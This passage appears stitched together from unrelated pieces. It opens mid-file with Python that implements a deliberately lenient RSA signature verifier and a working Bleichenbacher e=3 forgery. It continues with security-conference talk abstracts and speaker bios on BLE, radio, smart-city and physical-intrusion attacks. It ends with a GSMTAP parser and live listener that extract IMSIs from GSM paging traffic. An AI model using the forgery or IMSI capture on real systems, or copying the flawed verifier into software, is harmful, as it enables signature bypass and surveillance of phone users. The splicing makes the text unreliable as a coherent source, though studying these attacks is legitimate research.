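    em = _decode(sig, n, e)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:  # any number of FF bytes accepted
        i += 1
    if i + 3 > len(em) or em[i] != 0x00 or em[i + 1] != 0x30:
        return False
    body = em[i + 3:i + 3 + em[i + 2]]  # SEQUENCE length byte taken on trust
    if len(body) < 2 or body[0] != 0x30:
        return False
    j = 2 + body[1]  # skip AlgorithmIdentifier by its own length byte
    if body[j:j + 2] != b"\x04\x20":
        return False
    return body[j + 2:j + 34] == hashlib.sha256(msg).digest()  # trailing bytes never checked

def _icbrt(x):
    """Floor integer cube root: Newton iteration from above, then an exact fix-up."""
    r = 1 << ((x.bit_length() + 2) // 3)
    while (nr := (2 * r + x // (r * r)) // 3) < r:
        r = nr
    while r ** 3 > x:
        r -= 1
    while (r + 1) ** 3 <= x:
        r += 1
    return r

def forge_for_lenient(msg, n):
    """Bleichenbacher's e=3 forgery: minimal padding + DigestInfo at the top of the block,
    the rest left free, s = ceil(cbrt(target)). Then s^3 = target + delta with delta far
    smaller than the free part, so the checked prefix survives. No private key involved."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    free_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << free_bits
    s = _icbrt(target) + 1
    assert (s ** 3) >> free_bits == int.from_bytes(prefix, "big")
    return s.to_bytes(k, "big")
```

Calling make_toy_key(), then sign() and forge_for_lenient() on the same message, verify_strict accepts only the genuine signature while verify_lenient accepts both. The fix is the one RFC 8017 prescribes and verify_strict implements: never parse the decoded block, rebuild what it must be and compare all k bytes in constant time.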
When we think of warez, we think of video games, the Adobe suite or Microsoft Word. But there is another scene that has also existed for a long time: the one for industrial control software.
These programs are the development and interaction environments for physical control systems, used to program industrial PLCs; in short, the software that keeps our industrial world running.
Here we will try to analyse this market from two angles.
On one side, a technical analysis looking at some cracks and keygens, but also at tools that bypass the built-in security of PLCs, to see what they actually do and whether their actions are legitimate or just snake oil and a lot of malware.
On the other side, the distribution, the sellers and the target customers of this market.
biero-el-corridor
With an atypical path that started in a bakery and ended with a master's degree in cybersecurity, he became interested in industrial control system security after attending a course given by a PhD on the subject, and has worked in the field since late 2022. Currently a freelancer in this area.
The Bluetooth Low Energy protocol and its vulnerabilities: everyone knows them, because they regularly make the headlines, and 2026 has been no exception. A simplified pairing mechanism exploitable by attackers, unencrypted communications leaking sensitive information, humanoid robots compromised through a command injection delivered over BLE, audio stream injection into earbuds: so many problems revealed over the past few years thanks to many security researchers, and they damage the image of this protocol and of the devices that use it. But do you really know *all* the means at your disposal to compromise such devices? In this talk we will look at lesser-known aspects of the Bluetooth Low Energy protocol and how they can be exploited to compromise the integrity and security of connected devices. Some of these techniques were discovered while analysing various implementations, or directly during tests on home-automation devices or smartphones; others are very little known or have never been published to date. Whether you are an expert on this protocol or a curious newcomer wanting to discover advanced attacks, this talk may teach you some rather surprising things.
virtualabs
Having fallen into the Bluetooth Low Energy cauldron almost more than 10 years ago, Virtualabs is the author of several tools related to this protocol and has unfortunately never managed to move on and take an interest in anything else in all that time. He has worked as a security engineer at Quarkslab since 2021, with a particular focus on hardware and software reverse engineering and wireless communication protocols.
Radio frequencies carry all sorts of data, from aviation communications to car key fobs, and most of it is surprisingly easy to intercept. This talk shows you how radio hacking actually works. No expensive equipment or years of experience needed. With the right tools and the right knowledge, the spectrum finally becomes visible.
Beemo (Noë Flatreaud)
Breaking stuff for fun and profit
Hi, I'm Noë Flatreaud. People may call me Beemo.
I'm an IT Consultant, FOSS Advocate & Cybersecurity Researcher interested in cryptography. Currently living in France, working as an infosec speaker and advisor.
I like teaching.
I'm a part-time speaker and teacher. I taught Cryptography (MIT 6.875, CYP-01).
I taught Incident Response and Cybersecurity. I break things, for fun and profit.
I do hardware and software security research, mostly for fun but sometimes for profit.
What should you expect here?
Mostly short-to-mid-length essays about anything that goes through my mind. I thought about doing it consistently, but it's too much work for a lazy ass like me.
How can you contact me?
You can find me on Github, Twitter, Mastodon, Linkedin or Medium.
You can also email me if you so desire. I'm happy to talk about nearly everything.
Need privacy? You can find my public key online or below:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: A34F 8EF1 20A1 E177 588C 74EC 5692 E703 63D2 C426
Comment: Noë Flatreaud <nflatrea@mailo.com>

xjMEZrtVshYJKwYBBAHaRw8BAQdAoS2/InzvpFldcDQAcrzSBkjjTOXvXvdR3IaH
9Xfu8JvNI05vw6sgRmxhdHJlYXVkIDxuZmxhdHJlYUBtYWlsby5jb20+wpMEExYK
ADsWIQSjT47xIKHhd1iMdOxWkucDY9LEJgUCZrtVsgIbAwULCQgHAgIiAgYVCgkI
CwIEFgIDAQIeBwIXgAAKCRBWkucDY9LEJqx1AQDiARyx1Qnj7QTDFG6zgUI+SCBY
6ybwz09XMMOUyFNYwQEAzHy9ixi8wKOV+EhxhysyDR0j+xtHZBJjnovGI1eAzA7O
OARmu1WyEgorBgEEAZdVAQUBAQdAtXZUa4JOQSxnYsdx2975cI9qAdN7Is56qSLT
XWW6skEDAQgHwngEGBYKACAWIQSjT47xIKHhd1iMdOxWkucDY9LEJgUCZrtVsgIb
DAAKCRBWkucDY9LEJlY0AP0a3K8k2TrK6bo9oB9VHlqgiB7k9ocrewJc2DnyO3Ae
IwD/USvjJseBzFCvWf676gJvCpgtDSKD7TJoXJkD1VuKKAs=
=Gsyx
-----END PGP PUBLIC KEY BLOCK-----
"Smart city" applications promise safety, modernity and energy savings. On paper, everything is perfectly under control. In reality... let's say it is more luminous than secure. This presentation analyses a mobile application used to control public lighting, report dangerous areas and share one's location with relatives. Officially the system is protected and restricted (and, according to its creator, "unhackable"). In practice, even a moderate understanding of how it works is enough to bypass the geographic restrictions and switch on every streetlight in a city (or even in hundreds of municipalities) without any authentication. But that is only the beginning. Critical flaws also make it possible to identify supposedly anonymous users, reconstruct their habits, access private events and manipulate real-time location sharing. Through rigorous technical analysis and a certain sense of nuance, this talk highlights a simple truth: advertising advanced security is not enough to make it real.
MadSquirrel Benoît Forgette
Passionate about how systems work since my childhood and with an initial education in computer science, I gradually moved to the security of these systems and the electronic side of this equipment. Today, I work as a Cybersecurity Engineer in software and hardware reverse engineering at Quarkslab, where my daily work consists of disassembling equipment sent by our clients, then inspecting all of its attack surfaces (hardware, radio, software, cloud). Then, we help our clients find the best way to protect their systems and their equipment. In this work, the part I find most interesting is the automation/instrumentation/hijacking part. It is fascinating to see how far a piece of equipment can be hijacked from its original purpose. This is even more impressive when we talk about physical equipment that has an impact on its environment.
Have you ever tried to sneak into a high-security event?
Probably not. We have :).
In this talk we will see how the security measures of some of the biggest events can be bypassed using various methods, tools and techniques, from OSINT to social engineering.
Starting from real cases of physical intrusion, we will dissect their architecture: perimeters, access zones, human roles, accreditations, etc.
Finally, demonstrations will show how measures designed to protect can become exploitable as soon as validation relies on human mechanisms.
SkyZe
I am SkyZe, curious by nature; I like to find out how things work, to bypass them but also to defend them. That is why I am now a Cybersecurity Engineer with a strong passion for anything closely or remotely related to physical intrusion.
How to listen to the 3G network with what you have at hand? With a TV receiver, a home-made antenna, gr-gsm and simple_IMSI-catcher.py!
Oros
A long-time hacker, I am an active member of the Rennes hackerspace. I dabble in everything (electronics, hardware, servers, programming, forensics, pentesting, reverse engineering, AI, radio communications).
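The toolchain named in this abstract works as a pipeline: grgsm_livemon (from gr-gsm) demodulates a GSM control channel received by the RTL-SDR TV dongle and forwards each decoded block as a GSMTAP datagram to UDP port 4729 on localhost, and simple_IMSI-catcher.py reads that stream and pulls subscriber identities out of the Layer 3 messages. The Python below is an added example, not that script's code: a minimal parser for GSMTAP v2 headers and for GSM Paging Request Type 1 messages on the CCCH, decoding the Mobile Identity element (3GPP TS 24.008 10.5.1.4) as IMSI or TMSI. The two sample datagrams are constructed by hand with a test-PLMN IMSI (001 01 ...), not captured off the air; the header constants are those of the public gsmtap.h. One caveat a practitioner should keep in mind: gr-gsm demodulates the GSM (2G) air interface and does not decode UMTS (3G) channels, so what this pipeline sees is whatever the network and handsets exchange over GSM.

```python
"""GSMTAP -> GSM paging request -> mobile identity, an added minimal parser.
Mirrors the data path of grgsm_livemon (GSMTAP over UDP 4729) feeding an IMSI catcher
script; layouts follow gsmtap.h, 3GPP TS 44.018 9.1.22 (Paging Request Type 1) and
3GPP TS 24.008 10.5.1.4 (Mobile Identity). All sample datagrams are constructed."""
import socket
import struct

GSMTAP_HDR = struct.Struct(">BBBBHbbIBBBB")  # 16-byte version 2 header
GSMTAP_TYPE_UM = 1
GSMTAP_CHANNEL_CCCH = 2
GSMTAP_CHANNEL_PCH = 5
RR_PD = 0x06  # protocol discriminator: radio resource management
PAGING_REQUEST_TYPE_1 = 0x21
ID_TYPES = {0: "none", 1: "IMSI", 2: "IMEI", 3: "IMEISV", 4: "TMSI"}

def decode_mobile_identity(mi):
    """TS 24.008 10.5.1.4: bits 1-3 type, bit 4 odd/even, BCD digits in the nibbles."""
    if not mi:
        return None
    id_type = ID_TYPES.get(mi[0] & 0x07, "reserved")
    if id_type == "TMSI":  # octet 3 is 0xF4, then 4 raw TMSI bytes
        return id_type, mi[1:5].hex()
    if id_type in ("none", "reserved"):
        return id_type, None
    odd = (mi[0] >> 3) & 1
    digits = [mi[0] >> 4]  # digit 1 sits in the high nibble of octet 3
    for b in mi[1:]:
        digits += [b & 0x0F, b >> 4]  # low nibble first, then high nibble
    if not odd:
        digits.pop()  # even digit count: the last nibble is 0xF filler
    return id_type, "".join(str(d) for d in digits)

def encode_mobile_identity_imsi(imsi):
    """Inverse of decode_mobile_identity for IMSIs; used to build the sample frames."""
    digits = [int(c) for c in imsi]
    odd = len(digits) % 2
    out = bytearray([(digits[0] << 4) | (odd << 3) | 0x01])
    rest = digits[1:] + ([] if odd else [0xF])
    for lo, hi in zip(rest[0::2], rest[1::2]):
        out.append((hi << 4) | lo)
    return bytes(out)

def parse_gsmtap(pkt):
    """Return (header dict, payload) for a GSMTAP v2 datagram, or None."""
    if len(pkt) < GSMTAP_HDR.size:
        return None
    ver, hdr_len, typ, ts, arfcn, sig, snr, fn, sub_type, *_ = GSMTAP_HDR.unpack_from(pkt)
    if ver != 2 or len(pkt) < hdr_len * 4:
        return None
    hdr = {"type": typ, "timeslot": ts, "arfcn": arfcn & 0x3FFF,  # top bits are flags
           "signal_dbm": sig, "frame_number": fn, "sub_type": sub_type}
    return hdr, pkt[hdr_len * 4:]

def identities_from_ccch(l2):
    """Mobile identities in a Paging Request Type 1 carried in a 23-byte CCCH block:
    L2 pseudo-length octet, L3 message, 0x2B fill. Reads Mobile Identity 1 (LV) and
    the optional Mobile Identity 2 (TLV, IEI 0x17)."""
    if len(l2) < 5 or (l2[0] & 0x03) != 0x01:
        return []
    l3 = l2[1:1 + (l2[0] >> 2)]
    if len(l3) < 4 or (l3[0] & 0x0F) != RR_PD or l3[1] != PAGING_REQUEST_TYPE_1:
        return []
    pos = 3  # past PD, message type, page mode / channel needed
    found = [decode_mobile_identity(l3[pos + 1:pos + 1 + l3[pos]])]
    pos += 1 + l3[pos]
    if pos + 1 < len(l3) and l3[pos] == 0x17:
        found.append(decode_mobile_identity(l3[pos + 2:pos + 2 + l3[pos + 1]]))
    return found

def identities_from_gsmtap(pkt):
    """Full path: GSMTAP datagram -> CCCH/PCH block -> identities (empty if not applicable)."""
    parsed = parse_gsmtap(pkt)
    if parsed is None or parsed[0]["type"] != GSMTAP_TYPE_UM or \
            parsed[0]["sub_type"] not in (GSMTAP_CHANNEL_CCCH, GSMTAP_CHANNEL_PCH):
        return []
    return identities_from_ccch(parsed[1])

def build_paging_request(mi):
    """Constructed Paging Request Type 1 as sent on the downlink CCCH (23 bytes)."""
    l3 = bytes([RR_PD, PAGING_REQUEST_TYPE_1, 0x00, len(mi)]) + mi
    l2 = bytes([(len(l3) << 2) | 0x01]) + l3
    return l2 + b"\x2b" * (23 - len(l2))

def build_gsmtap(payload, sub_type=GSMTAP_CHANNEL_CCCH, arfcn=975, fn=123456):
    """Constructed GSMTAP v2 datagram framed the way grgsm_livemon frames decoded blocks."""
    return GSMTAP_HDR.pack(2, 4, GSMTAP_TYPE_UM, 0, arfcn, -70, 10, fn, sub_type, 0, 0, 0) + payload

# Constructed samples, not captured: paging by a test-PLMN (001 01) IMSI, and by TMSI.
SAMPLE_IMSI_PKT = build_gsmtap(build_paging_request(encode_mobile_identity_imsi("001010123456789")))
SAMPLE_TMSI_PKT = build_gsmtap(build_paging_request(b"\xf4\xde\xad\xbe\xef"))

def listen(host="127.0.0.1", port=4729):
    """Consume the live GSMTAP stream from grgsm_livemon (network use, not exercised offline)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    while True:
        pkt, _ = sock.recvfrom(4096)
        for id_type, value in identities_from_gsmtap(pkt):
            print(id_type, value)
```

Run listen() while grgsm_livemon is tuned to a cell's beacon frequency and every paging request that carries a plain IMSI instead of a TMSI is printed; that is the leak an IMSI catcher script lives on, and it is the operator's (in)frequency of TMSI reallocation, not anything on the receiving side, that decides how much shows up.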
